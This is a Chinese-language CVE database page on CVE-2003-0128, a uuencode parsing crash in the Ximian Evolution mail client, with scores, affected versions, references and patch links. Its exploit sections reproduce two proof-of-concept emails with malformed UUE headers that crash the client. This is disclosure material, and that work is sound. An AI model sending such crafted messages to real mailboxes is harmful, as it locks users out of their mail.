CVE-2003-0128
CVSS5.0
发布时间 :2003-03-24 00:00:00
修订时间 :2016-10-17 22:29:52
NMCOES    

[原文]The try_uudecoding function in mail-format.c for Ximian Evolution Mail User Agent 1.2.2 and earlier allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a malicious uuencoded (UUE) header, possibly triggering a heap-based buffer overflow.


[CNNVD]Ximian Evolution UUEncoding编码解析内存破坏漏洞(CNNVD-200303-075)

        
        Ximian Evolution是个人和工作组信息管理解决方案,可使用在Linux和Unix操作系统下,集成Email、日历、会议安排、联系人管理等。
        Ximian Evolution在解析'uuencode'编码的内容时存在问题,远程攻击者可以利用这个漏洞使Ximinan Evolution进程内存破坏,导致拒绝服务攻击。
        Evolution mailer接收到'uuencode'编码的内容后会以透明的方式对其进行解码,通过插入特殊构建的UUE头到EMAIL中,在解析过程中会发生内存破坏,而导致客户端崩溃。
        所有mail/mail-format.c模块中包含try_uudecoding函数的Evolution存在此漏洞,目前还不了解是否能用于执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:ximian:evolution:1.2
cpe:/a:ximian:evolution:1.0.8
cpe:/a:ximian:evolution:1.0.4
cpe:/a:ximian:evolution:1.2.2
cpe:/a:ximian:evolution:1.0.7
cpe:/a:ximian:evolution:1.0.5
cpe:/a:ximian:evolution:1.0.3
cpe:/a:ximian:evolution:1.2.1
cpe:/a:ximian:evolution:1.0.6
cpe:/a:ximian:evolution:1.1.1

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:107Ximian Evolution Mail User Agent uuencoded header Denial of Service
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0128
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0128
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200303-075
(官方数据源) CNNVD

- 其它链接及资源

http://archives.neohapsis.com/archives/vulnwatch/2003-q1/0141.html
(UNKNOWN)  BUGTRAQ  20030319 CORE-2003-03-04-01: Multiple vulnerabilities in Ximian 's Evolution Mail User Agent
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000648
(UNKNOWN)  CONECTIVA  CLA-2003:648
http://marc.info/?l=bugtraq&m=104826470527308&w=2
(UNKNOWN)  BUGTRAQ  20030321 GLSA: evolution (200303-18)
http://www.coresecurity.com/common/showdoc.php?idx=309&idxseccion=10
(VENDOR_ADVISORY)  MISC  http://www.coresecurity.com/common/showdoc.php?idx=309&idxseccion=10
http://www.gentoo.org/security/en/glsa/glsa-200303-18.xml
(UNKNOWN)  GENTOO  GLSA-200303-18
http://www.mandriva.com/security/advisories?name=MDKSA-2003:045
(UNKNOWN)  MANDRAKE  MDKSA-2003:045
http://www.redhat.com/support/errata/RHSA-2003-108.html
(UNKNOWN)  REDHAT  RHSA-2003:108
http://www.securityfocus.com/bid/7117
(VENDOR_ADVISORY)  BID  7117

- 漏洞信息

Ximian Evolution UUEncoding编码解析内存破坏漏洞
中危 未知
2003-03-24 00:00:00 2005-10-20 00:00:00
远程  
        
        Ximian Evolution是个人和工作组信息管理解决方案,可使用在Linux和Unix操作系统下,集成Email、日历、会议安排、联系人管理等。
        Ximian Evolution在解析'uuencode'编码的内容时存在问题,远程攻击者可以利用这个漏洞使Ximinan Evolution进程内存破坏,导致拒绝服务攻击。
        Evolution mailer接收到'uuencode'编码的内容后会以透明的方式对其进行解码,通过插入特殊构建的UUE头到EMAIL中,在解析过程中会发生内存破坏,而导致客户端崩溃。
        所有mail/mail-format.c模块中包含try_uudecoding函数的Evolution存在此漏洞,目前还不了解是否能用于执行任意指令。
        

- 公告与补丁

        厂商补丁:
        RedHat
        ------
        RedHat已经为此发布了一个安全公告(RHSA-2003:108-01)以及相应补丁:
        RHSA-2003:108-01:Updated Evolution packages fix multiple vulnerabilities
        链接:https://www.redhat.com/support/errata/RHSA-2003-108.html
        补丁下载:
        Red Hat Upgrade evolution-1.0.8-11.i386.rpm
        ftp://updates.redhat.com/8.0/en/os/i386/evolution-1.0.8-11.i386.rpm
        Red Hat Linux 8.0
        Red Hat Upgrade evolution-1.0.8-9.7x.i386.rpm
        ftp://updates.redhat.com/7.3/en/os/i386/evolution-1.0.8-9.7x.i386.rpm
        Red Hat Linux 7.3
        Red Hat Upgrade gal-0.19.2-3.7x.i386.rpm
        ftp://updates.redhat.com/7.3/en/os/i386/gal-0.19.2-3.7x.i386.rpm
        Red Hat Linux 7.3
        Red Hat Upgrade gal-devel-0.19.2-3.7x.i386.rpm
        ftp://updates.redhat.com/7.3/en/os/i386/gal-devel-0.19.2-3.7x.i386.rpm
        Red Hat Linux 7.3
        Red Hat Upgrade libgal19-0.19.2-3.7x.i386.rpm
        ftp://updates.redhat.com/7.3/en/os/i386/libgal19-0.19.2-3.7x.i386.rpm
        Ximian
        ------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载1.2.3版本:
        
        http://www.ximian.com/products/ximian_evolution/

- 漏洞信息 (22370)

Ximian Evolution 1.x UUEncoding Denial of Service Vulnerability (EDBID:22370)
linux dos
2003-03-17 Verified
0 Core Security
N/A [点击下载]
source: http://www.securityfocus.com/bid/7118/info

A vulnerability has been discovered in the Ximian Evolution Mail User Agent (MUA). The problem occurs when the mailer attempts to process a maliciously encoded e-mail message. When attempting to decode the message, the MUA will repeatedly attempt to allocate memory, resulting in system resource exhaustion and will eventually crash.

This vulnerability affects Ximian Evolution version 1.2.2 and earlier.

From xxx@corest.com Wed Mar 5 14:06:02 2003
Subject: xxx
From: X X. X <xxx@corest.com>
To: xxx@corest.com
Content-Type: multipart/mixed; boundary=3D"=3D-mTDu5zdJIsixETTwCF5Y"
Message-Id: <1046884154.1731.5.camel@vaiolin>
Mime-Version: 1.0
Date: 05 Mar 2003 14:09:14 -0300

--=3D-mTDu5zdJIsixETTwCF5Y
Content-Disposition: inline; filename=3Dname
Content-Type: application/octet-stream; name=3Dname
Content-Transfer-Encoding: 7bit

begin 600 phase2
M8F5G:6X@-C P('!H87-E,0I-.$8U1SHV6$ M0R!0*"<Q13XG,"HS,RA&+310
M6RE%42 N,SQ9,3-1)S$T*%LU0R4Y*E0I.#-"*2 R,D19"DTP0B4Y+E4\5# C
M138W-3!(*5,E+RHB/%$R(TA7*R0@7"E%52DN5#Q0,T!)+2I4*$$V,TTW+20M7#%#,2 *32\D.%4P,T1',20@72E%42 O,SQ-,3) 1"LR7%0Q(S$@+$,Q-2PC
M(%0K,S!(+$(Q(2A$(2DQ4TTR*#1 6 I-+4)5*R)$-$@I5#4O+S,\23131%8T
M-#A(+$(Q(2A$(2DU4U4W+R186#5%53(N,SQ-,3-!-RTU*%HM4R4Y"C,J5#A-
?,U-,4#(B2$(P(B! (D(@*CDV640B0" @"B *96YD"@

end
--=3D-mTDu5zdJIsixETTwCF5Y--		

- 漏洞信息

13490
Ximian Evolution Mail User Agent try_uudecoding Function UUE Header Overflow
Input Manipulation
Loss of Integrity

- 漏洞描述

Unknown or Incomplete

- 时间线

2003-03-19 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Ximian Evolution UUEncoding Parsing Memory Corruption Vulnerability
Unknown 7117
Yes No
2003-03-17 12:00:00 2009-07-11 09:06:00
Discovered by Diego Kelyacoubian, Javier Kohen, Alberto Solino, and Juan Vera of Core Security Technologies.

- 受影响的程序版本

Ximian Evolution 1.2.2
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
+ RedHat Linux 9.0 i386
Ximian Evolution 1.2.1
Ximian Evolution 1.2
Ximian Evolution 1.1.1
Ximian Evolution 1.0.8
+ Mandriva Linux Mandrake 9.0
Ximian Evolution 1.0.7
Ximian Evolution 1.0.6
Ximian Evolution 1.0.5
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
Ximian Evolution 1.0.4
Ximian Evolution 1.0.3
+ Conectiva Linux 8.0
+ Conectiva Linux 7.0
+ RedHat Linux 7.3
Ximian Evolution 1.2.3

- 不受影响的程序版本

Ximian Evolution 1.2.3

- 漏洞讨论

The Evolution mail client supports "uuencoded" content and decodes it automatically when a message is initially parsed. A memory corruption error is present in the parsing component that can result in the client crashing when specially malformed content is decoded. The presence of such a message in an Evolution user's mailbox may result in a prolonged denial of service as the crashing of the GUI may prevent deletion of the message. The user will also not be able to read messages while the message is present in their mailbox. It is not yet determined whether this vulnerability may be exploited by remote attackers to compromise client hosts. Users are advised to upgrade despite this uncertainty.

- 漏洞利用

The following is taken from the advisory published by Core Security Technologies (see reference section):

The following email will reproduce this vulnerability, note that
an empty line is required before and after the UUE header line.

&gt;From xxx@corest.com Wed Mar 5 14:06:02 2003
Subject: xxx
From: X X. X &lt;xxx@corest.com&gt;
To: xxx@corest.com
Content-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y"
Message-Id: &lt;1046884154.1731.5.camel@vaiolin&gt;
Mime-Version: 1.0
Date: 05 Mar 2003 14:09:14 -0300

--=-mTDu5zdJIsixETTwCF5Y
Content-Disposition: inline; filename=name
Content-Type: application/octet-stream; name=name
Content-Transfer-Encoding: 7bit

begin 600

end

--=-mTDu5zdJIsixETTwCF5Y--

- 解决方案

Red Hat has released a security advisory (RHSA-2003:108-01) which contains fixes for this issue. Users are advised to upgrade as soon as possible.

The appropriate fixes have been applied to the Evolution CVS tree.

Ximian has reported that Evolution 1.2.3 will be released however, it does not appear to be available at this time. Users are advised to monitor the Ximian Evolution release page for further information.

Conectiva Linux has released an advisory. Affected users are advised to upgrade to new versions of Evolution. Further information about obtaining and applying fixes are available in the referenced advisory.


Ximian Evolution 1.0.3

Ximian Evolution 1.0.8

Ximian Evolution 1.2.2

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站